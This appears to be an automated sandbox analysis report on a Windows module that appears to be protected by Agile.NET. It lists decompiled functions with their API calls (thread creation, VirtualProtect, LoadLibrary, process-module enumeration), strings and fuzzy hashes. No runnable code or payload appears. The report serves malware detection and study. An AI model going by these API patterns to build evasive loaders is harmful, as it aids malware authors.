Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$EnumFreeModules$AllocInformationModuleQueryVirtual
String ID:
API String ID: 4262206646-0
Opcode ID: f1b49e5dcc3ec2cf59e4d3b5c6c14953284e2550cd6822c27d93aa059ffdccf4
Instruction ID: 67920878157d1f3f557132c9d66d4d4bf22c1f83d94115f40c02d8683e834aeb
Opcode Fuzzy Hash: f1b49e5dcc3ec2cf59e4d3b5c6c14953284e2550cd6822c27d93aa059ffdccf4
Instruction Fuzzy Hash: F1610A36718A8596E774CB1AE46436EB7A0F7C8784F408136EA8E87B68DF3CD5458F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC1D70, Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FFD7ACC1D81
CreateEventW.KERNEL32 ref: 00007FFD7ACC1D9B
CreateEventW.KERNEL32 ref: 00007FFD7ACC1DB5
GetCurrentThreadId.KERNEL32 ref: 00007FFD7ACC1DC2
CreateThread.KERNELBASE ref: 00007FFD7ACC1DEE

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Create$Event$Thread$Current
String ID:
API String ID: 4115085679-0
Opcode ID: 81d0fca3617dce84e9447a9b99591e8606d6e50b48b280d0001a6c6406541dee
Instruction ID: 6c69f709ce55ba64757f0e9279e09821fff4258fac39b2fd36d0b4cd4c6e62b8
Opcode Fuzzy Hash: 81d0fca3617dce84e9447a9b99591e8606d6e50b48b280d0001a6c6406541dee
Instruction Fuzzy Hash: 41011D3BB28B42A2F7A89B35B866F6E3261FB84314F505179D94F06B70CE3DE1588700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC1F40, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFD7ACC1C82), ref: 00007FFD7ACC1FA3

Part of subcall function 00007FFD7ACC1EC0: GetTickCount.KERNEL32 ref: 00007FFD7ACC1ED6
Part of subcall function 00007FFD7ACC1EC0: GetTickCount.KERNEL32 ref: 00007FFD7ACC1EFB

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: f80cb61c89d33c2232b3e099c83d3592c43c439f46915bcc95f91fc8b3857663
Instruction ID: 275aecdd32f46d2ea187c5ec8b03dd2618ae0693a1d53ff059c4ca21df8298f9
Opcode Fuzzy Hash: f80cb61c89d33c2232b3e099c83d3592c43c439f46915bcc95f91fc8b3857663
Instruction Fuzzy Hash: 24014877B286429EE758CB16E49032E7790F788394F110175F58D86774DF3CD0408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC7E30, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 230memorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD7ACC9C70: EnterCriticalSection.KERNEL32 ref: 00007FFD7ACC9C83

Part of subcall function 00007FFD7ACC5210: _wcsupr_s.LIBCMTD ref: 00007FFD7ACC5254

Part of subcall function 00007FFD7ACC9CB0: LeaveCriticalSection.KERNEL32 ref: 00007FFD7ACC9CCE

RaiseException.KERNEL32 ref: 00007FFD7ACC7FDE
WaitForSingleObject.KERNEL32 ref: 00007FFD7ACC80AC
WaitForSingleObject.KERNEL32 ref: 00007FFD7ACC80FB
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC818F
HeapAlloc.KERNEL32 ref: 00007FFD7ACC81A0
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC82BF
HeapFree.KERNEL32 ref: 00007FFD7ACC82CF
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC82DD
HeapFree.KERNEL32 ref: 00007FFD7ACC82ED

Strings

Agile.NET runtime internal error occurred., xrefs: 00007FFD7ACC7F91
cr, xrefs: 00007FFD7ACC820A

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$CriticalFreeObjectSectionSingleWait$AllocEnterExceptionLeaveRaise_wcsupr_s
String ID: Agile.NET runtime internal error occurred.$cr
API String ID: 1784018953-3111436492
Opcode ID: 0a3ef177b036df52e8a6c1dd6ed6da2bae3dbe5c14b6fc34137a364b39488c9d
Instruction ID: 5709bd98c790cb74841f769c71a56f2f17aa53d64f2130cd0ca78ae6cb758457
Opcode Fuzzy Hash: 0a3ef177b036df52e8a6c1dd6ed6da2bae3dbe5c14b6fc34137a364b39488c9d
Instruction Fuzzy Hash: F5C1FA3A61CAC5D5EB64DB56E4983AEB7A0F7C8B90F004126DA8E47B68DF3CD445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC12E0, Relevance: 15.1, APIs: 10, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC1355
HeapAlloc.KERNEL32 ref: 00007FFD7ACC136B
EnumProcessModules.PSAPI ref: 00007FFD7ACC1390
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC13B8
HeapFree.KERNEL32 ref: 00007FFD7ACC13C8

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocEnumFreeModules
String ID:
API String ID: 384433944-0
Opcode ID: c491e635c4bb3813ad5ed5b3160e2770fb73921856650db40a1efe5742fbdc77
Instruction ID: 565fb933895da264dbdf6cd79c727788c96740f43f2b3ee1cecde8760a06c3a6
Opcode Fuzzy Hash: c491e635c4bb3813ad5ed5b3160e2770fb73921856650db40a1efe5742fbdc77
Instruction Fuzzy Hash: 1C51ED7AA2CA8192E774DB16E4543AEB7A0FBC8748F404176DB8E47B68DF3CD1448B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC5540, Relevance: 10.9, APIs: 7, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: QueryVirtual
String ID:
API String ID: 1804819252-0
Opcode ID: a36ff4930331832e1401d3d0ae3e8cc603ca0edc67f44c26fa91c24cb2730c50
Instruction ID: b58767a1510296089234504061c89c7909b0846dd87f08fd7643763fd3505836
Opcode Fuzzy Hash: a36ff4930331832e1401d3d0ae3e8cc603ca0edc67f44c26fa91c24cb2730c50
Instruction Fuzzy Hash: 7B12073A618AC596DB74CB19E0903AEB7A1F7C8790F404066EA8D87B69DF3DE451CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC5210, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

_wcsupr_s.LIBCMTD ref: 00007FFD7ACC5254
_wcsupr_s.LIBCMTD ref: 00007FFD7ACC527C

Strings

UKKED, xrefs: 00007FFD7ACC52B0

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: _wcsupr_s
String ID: UKKED
API String ID: 600324503-4206113906
Opcode ID: d5f32c3667cd54056f80cb04c8cb51b5c771ac10389c55b599fef08bc484cc9a
Instruction ID: efded5cce3b9b9cb4bad09af39b6874f67678ecd3be3e2908fd824e0b245b8d9
Opcode Fuzzy Hash: d5f32c3667cd54056f80cb04c8cb51b5c771ac10389c55b599fef08bc484cc9a
Instruction Fuzzy Hash: 7A712276B2C6C650EA759716E4613FF6391FFC8B80F014076DA8D4BBA9DE2DD5408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCB460, Relevance: 6.1, APIs: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD7ACCED40: lstrcpyW.KERNEL32 ref: 00007FFD7ACCED58

CreateFileW.KERNELBASE ref: 00007FFD7ACCB4D3
GetFileSize.KERNEL32 ref: 00007FFD7ACCB4E8

Part of subcall function 00007FFD7ACCE620: GetProcessHeap.KERNEL32 ref: 00007FFD7ACCE629
Part of subcall function 00007FFD7ACCE620: RtlAllocateHeap.NTDLL ref: 00007FFD7ACCE639

ReadFile.KERNELBASE ref: 00007FFD7ACCB537
FindCloseChangeNotification.KERNELBASE ref: 00007FFD7ACCB542

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSizelstrcpy
String ID:
API String ID: 3472503797-0
Opcode ID: c0b3265c3ad6248f860caf4d947b7633518418236875263b3f9019d171614f68
Instruction ID: 791f8fd1bf0c7a976643d6a4a486119eef2a8a692a96714e61d119ebd99960fb
Opcode Fuzzy Hash: c0b3265c3ad6248f860caf4d947b7633518418236875263b3f9019d171614f68
Instruction Fuzzy Hash: DC417276A18B84C7EB008F5AE09435ABBA0F7C8B84F204166EB8D07B68CF7DC0458F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9230, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_mbsset.LIBCMTD ref: 00007FFD7ACC924B
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC92AD
HeapAlloc.KERNEL32 ref: 00007FFD7ACC92BE

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess_mbsset
String ID:
API String ID: 3511588043-0
Opcode ID: 319be7662bb7be1a29f1a2f4259f94a79dd599eec29cd4ebb662f767b7f8468c
Instruction ID: 05ef0eceb00089d942cbaca9b2ac028d0f550b7d56a13617e8a437ef17a8a7e5
Opcode Fuzzy Hash: 319be7662bb7be1a29f1a2f4259f94a79dd599eec29cd4ebb662f767b7f8468c
Instruction Fuzzy Hash: B721EC3A628B8596DB15DB26E45001EB7B4F7C9BD0B118262EA8D47779DF3DD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC4D50, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FFD7ACC4D94

Strings

UKKED, xrefs: 00007FFD7ACC4D8D

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: UKKED
API String ID: 1431749950-4206113906
Opcode ID: aa06c2ed48422e947881c478cac6bc60674f1fde3d1e5933cd1b6d3cdf0f37c0
Instruction ID: 9e30edd905391da7d858d6e43205736cad16d514331538eb126dd03691fb0699
Opcode Fuzzy Hash: aa06c2ed48422e947881c478cac6bc60674f1fde3d1e5933cd1b6d3cdf0f37c0
Instruction Fuzzy Hash: 86216B3BA28A42D5EA28DB01E59426EB7A1FBC4790F414076EA8D4BB78DF7CD040CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC591F, Relevance: 3.1, APIs: 2, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD7ACC5AE3
VirtualProtect.KERNELBASE ref: 00007FFD7ACC5B52

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0f18c97556ee0d28b1e65d8d35d17da68af48f94e94f9935adff91d4d992ad8f
Instruction ID: fddd2f9a20831c9e89128b0033bf8b95b725bf77744f04f890220c810aa38fe7
Opcode Fuzzy Hash: 0f18c97556ee0d28b1e65d8d35d17da68af48f94e94f9935adff91d4d992ad8f
Instruction Fuzzy Hash: 1151D67A6197C08ADB64CF19E0907AEB7A1F3D4740F405066EA8E87BA8DE7DD451CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9090, Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC913F
RtlAllocateHeap.NTDLL ref: 00007FFD7ACC9152

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 14d1efa5737cc4830d3cf6b972e37f82203c6a9c674f276b6b8799a798b4da2a
Instruction ID: c172cd073f9cbd2e65ac27308a7c44e2faee718898d8eabb162df47139472203
Opcode Fuzzy Hash: 14d1efa5737cc4830d3cf6b972e37f82203c6a9c674f276b6b8799a798b4da2a
Instruction Fuzzy Hash: 5621A47A608B85C6DB14CF1AE09421EBBB0F7C9B84F218126EB8D47768DF3AD545CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC30A0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FFD7ACC3148

Strings

(, xrefs: 00007FFD7ACC30D4

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID: (
API String ID: 32694325-3887548279
Opcode ID: 20683df38db94d64aab57c444547a3f72de32856761851fd1ee3899811ec0d0d
Instruction ID: de5050f4cc7a07e4ef4099e9dff18799dcb0ef4a8308769fa98c5c2e89f7ba06
Opcode Fuzzy Hash: 20683df38db94d64aab57c444547a3f72de32856761851fd1ee3899811ec0d0d
Instruction Fuzzy Hash: 6811513BB2CAC1A4F7789B21F4643AE63A1EBC0344F010176D58C4B7B5DE2ED0559B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC1C30, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FFD7ACC1C40
SetEvent.KERNEL32 ref: 00007FFD7ACC1C6E

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: da6e1521970e8147b380b29ed3ccbf01235c3cb970a1b0a537bc7a0f487dbe5c
Instruction ID: da866f8c41339b2db86272a2a07bc746285d1a1b4ee0ee8ed18e7b60e583780c
Opcode Fuzzy Hash: da6e1521970e8147b380b29ed3ccbf01235c3cb970a1b0a537bc7a0f487dbe5c
Instruction Fuzzy Hash: 63F01276F2C042B6F6289B22D86827D2250BB88348F4101B2E58E4D574CF2CE585C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCE620, Relevance: 3.0, APIs: 2, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACCE629
RtlAllocateHeap.NTDLL ref: 00007FFD7ACCE639

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: d55c978c77708c3824cb9c4eaa7abc4830b1cc38df2eb2743a7ef6c71f73be1f
Instruction ID: eba03fff9d2e8bc2eea88036718c4b38ee434b651a5c526c6d9d377074dfef5e
Opcode Fuzzy Hash: d55c978c77708c3824cb9c4eaa7abc4830b1cc38df2eb2743a7ef6c71f73be1f
Instruction Fuzzy Hash: 98C01225E25A41A1E648BB6BB85801D6760FFC8745F408074D54F05224DD3C90594700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCE650, Relevance: 3.0, APIs: 2, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,00007FFD7ACCD03C), ref: 00007FFD7ACCE659
RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,?,00007FFD7ACCD03C), ref: 00007FFD7ACCE669

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: BoundaryDeleteDescriptorHeapProcess
String ID:
API String ID: 4240333050-0
Opcode ID: 2a9906aa49dd850d00b34dfbe99054eee2f7c37d74342275fb66976615a6482a
Instruction ID: 3da7748aef17db3fc3d76c60e9b90b990594521020c48abaa54426249ea4963f
Opcode Fuzzy Hash: 2a9906aa49dd850d00b34dfbe99054eee2f7c37d74342275fb66976615a6482a
Instruction Fuzzy Hash: BDC01265E25A41E1E608BB6BB85801D6760BFC8741F408074D54B05224DD3C90554600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9670, Relevance: 2.6, APIs: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD7ACC9090: GetProcessHeap.KERNEL32 ref: 00007FFD7ACC913F
Part of subcall function 00007FFD7ACC9090: RtlAllocateHeap.NTDLL ref: 00007FFD7ACC9152

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC9759
HeapFree.KERNEL32 ref: 00007FFD7ACC9769

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 2f5ae5f3495afb93f5af32d7c3272736bf7d3bc564947e6901bd81336cfff8c0
Instruction ID: c8ce978031f57c6d15928dfd4be158d1983a5622881bba407d605b5a3e98a2b3
Opcode Fuzzy Hash: 2f5ae5f3495afb93f5af32d7c3272736bf7d3bc564947e6901bd81336cfff8c0
Instruction Fuzzy Hash: D431A73A629B88D6C750CB1AE09021EB7A1F7C9B90F114166FA8E87B68DF38D451CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD07110961, Relevance: 1.7, APIs: 1, Instructions: 221libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00007FFD07110AF1

Memory Dump Source

Source File: 00000000.00000002.356548306.00007FFD07110000.00000040.00000001.sdmp, Offset: 00007FFD07110000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1c5a9fef25dd4f479f8d2385d745dc666f567ee8847ba66ea16fb3388faf2438
Instruction ID: e1a27ca92c709643d895634a6b1d21ed22a659a8a6ac0c61ee30d4b3f05edcf8
Opcode Fuzzy Hash: 1c5a9fef25dd4f479f8d2385d745dc666f567ee8847ba66ea16fb3388faf2438
Instruction Fuzzy Hash: ED61F530608A8D8FDB58DF28D8657F93BE1FF59311F10416EE84DCB292DA749881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC4EDD, Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD7ACC4F09

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e4acf05a8e80ebbc472537ff3f7aeab40a22d147ded91a8207cdc5fd6b866f67
Instruction ID: 4aff0f0cd0c0d7b388fd03ac973caff1408992e2cb8fe880bb28fd4cd2043a93
Opcode Fuzzy Hash: e4acf05a8e80ebbc472537ff3f7aeab40a22d147ded91a8207cdc5fd6b866f67
Instruction Fuzzy Hash: 67E04F37618A84E7C360DB56E44400EBB20F7897A8B540152FB8D0772ACF3CE154DF00

Uniqueness

Uniqueness Score: -1.00%

